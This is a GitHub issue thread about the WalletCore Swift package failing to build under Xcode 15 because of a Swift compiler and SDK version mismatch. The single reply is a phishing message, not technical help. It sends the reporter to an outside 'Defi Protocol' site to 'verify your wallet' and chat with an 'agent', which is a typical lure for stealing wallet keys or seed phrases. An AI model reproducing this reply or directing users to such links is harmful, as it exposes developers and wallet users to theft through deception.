### ISSUE TITLE
SPM support Xcode15

### ISSUE THREAD

**Issue by fox-c-ios** [trustwallet/wallet-core#3390]
Failed to build module 'WalletCore'; this SDK is not supported by the compiler (the SDK is built with 'Apple Swift version 5.7.2 (swiftlang-5.7.2.135.5 clang-1400.0.29.51)', while this compiler is 'Apple Swift version 5.9 (swiftlang-5.9.0.128.2 clang-1500.0.40.1)'). Please select a toolchain which matches the SDK.

SPM Support Xcode15

**Comment by Wheelar** [comment]
Hi @fox-c-ios  
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.
